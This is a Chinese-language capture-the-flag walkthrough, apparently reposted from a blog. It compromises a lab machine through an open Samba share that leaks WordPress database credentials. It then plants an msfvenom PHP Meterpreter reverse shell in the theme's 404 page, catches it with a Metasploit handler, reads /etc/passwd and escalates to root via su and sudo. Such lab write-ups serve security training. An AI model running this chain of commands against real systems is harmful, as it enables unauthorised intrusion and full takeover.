【CTF】SMB服务信息泄露
作者:互联网
kali:192.168.223.131
target:192.168.223.168
通过arp-scan扫出ip为192.168.223.168,再通过nmap扫描
nmap -sV 192.168.223.168
通过nmap扫描,发现开放22、80,其中139和445都是Samba服务器,3306是Mysql和6667端口
使用smbclient尝试连接
smbclient -L 192.168.223.168
发现没有密码,有print$、share$、IPC$,尝试连接share$
smbclient '\\192.168.223.168\share$'
直接Enter发现直接进去了,无密码
看一下里面的deets.txt文件
get deets.txt
开一个新终端打开deets.txt,里面找到密码为12345
通过观察smb服务器发现有wordpress,推测是网站目录,进入wordpress后找到wordpress的配置文件
get wp-config.php
在新的终端打开该文件,为数据库的连接文件,找到账号密码为Admin和TogieMYSQL12345^^
到这里没什么头绪了,对网站进行目录扫描
dirb http://192.168.223.168
扫出wordpress/wp-admin,尝试用上面获得的账号密码进行登陆,进入后台,在Appearance的Editor里面,发现可以编辑php文件
通过msf生成php木马,将其复制到对方的404页面的php文件中
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /shell.php
打开监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit
找到404页面,通过安装CMS获得地址,并运行,此时目标上线
192.168.223.168/wordpress/wp-content/themes/twentyfifteen/404.php
美化一下界面并看一下用户有哪些
python -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
找到有一个叫togie的用户,在home目录下,根据之前的deets.txt中获得密码进行提权
su togie
//12345
查看用户权限发现是三个ALL,直接提权至root
sudo -l
sudo su
然后在root目录下获取目标文件
标签:txt,deets,192.168,CTF,wordpress,223.168,php,泄露,SMB 来源: https://www.cnblogs.com/icui4cu/p/16123308.html